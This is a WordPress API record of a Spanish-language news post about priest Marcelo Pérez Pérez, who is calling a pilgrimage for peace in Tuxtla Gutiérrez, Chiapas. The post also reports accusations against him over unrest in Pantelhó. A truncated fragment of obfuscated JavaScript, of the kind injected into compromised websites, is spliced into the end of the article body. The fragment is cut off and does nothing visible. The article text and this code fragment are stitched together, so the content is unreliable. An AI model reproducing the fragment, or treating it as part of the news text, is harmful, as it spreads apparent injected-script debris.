{"id":17721,"date":"2024-09-09T04:23:19","date_gmt":"2024-09-09T04:23:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17721"},"modified":"2024-09-09T04:23:20","modified_gmt":"2024-09-09T04:23:20","slug":"invitan-a-peregrinacion-por-la-paz-en-tuxtla-gutierrez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17721","title":{"rendered":"Invitan a peregrinaci\u00f3n por la paz en Tuxtla Guti\u00e9rrez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0009-1024x577.jpg\" alt=\"\" class=\"wp-image-17722\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0009-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0009-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0009-768x433.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0009.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>8 de septiembre del 2024. SCLC.- El sacerdote Marcelo P\u00e9rez P\u00e9rez, p\u00e1rroco de la Iglesia de Guadalupe de San Crist\u00f3bal, invit\u00f3 a la poblaci\u00f3n cat\u00f3lica de Chiapas, a una peregrinaci\u00f3n Por la Paz, a realizarse el pr\u00f3ximo 13 de septiembre a las 9:30 de la ma\u00f1ana, partiendo de la Central de Abasto de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>En un v\u00eddeo que comparti\u00f3, el sacerdote que le han llamado por sobrenombre &#8220;El Padre Machete&#8221; justific\u00f3 que esta actividad es un llamado a las autoridades de Chiapas &#8220;ante esta situaci\u00f3n que tantos muertos, desplazamientos, desaparecidos&#8221;, como iglesia en Chiapas han decidido realizar est\u00e1s acciones.<\/p>\n\n\n\n<p>Marcelo P\u00e9rez, ha sido se\u00f1alado en diferentes ocasiones, por ser el principal responsable de la inestabilidad que prevalece en el municipio de Pantelh\u00f3, ya que es ah\u00ed donde \u00e9l se encontraba, antes de llegar como p\u00e1rroco a San Crist\u00f3bal, sin embargo, se encuentra convocando a marchas para evitar la violencia en Chiapas.-<\/p>\n\n\n\n<p>Marcelo P\u00e9rez, indic\u00f3 que para quienes viajan de otras ciudades, se concentraron a las 6:30 de la ma\u00f1ana en el estacionamiento de Soriana de San Crist\u00f3bal, para iniciar el viaje, d\u00f3nde est\u00e1n convocados hombres y mujeres de los pueblos originarios de los altos de Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 8 de septiembre del 2024. SCLC.- El sacerdote Marcelo P\u00e9rez P\u00e9rez, p\u00e1rroco de la Iglesia de Guadalupe de San Crist\u00f3bal, invit\u00f3 a la poblaci\u00f3n cat\u00f3lica de Chiapas, a una peregrinaci\u00f3n Por la Paz, a realizarse el pr\u00f3ximo 13 de septiembre a las 9:30 de la ma\u00f1ana, partiendo de la Central de Abasto &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17722,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17721","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17721","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17721"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17721\/revisions"}],"predecessor-version":[{"id":17723,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17721\/revisions\/17723"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17722"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17721"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17721"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}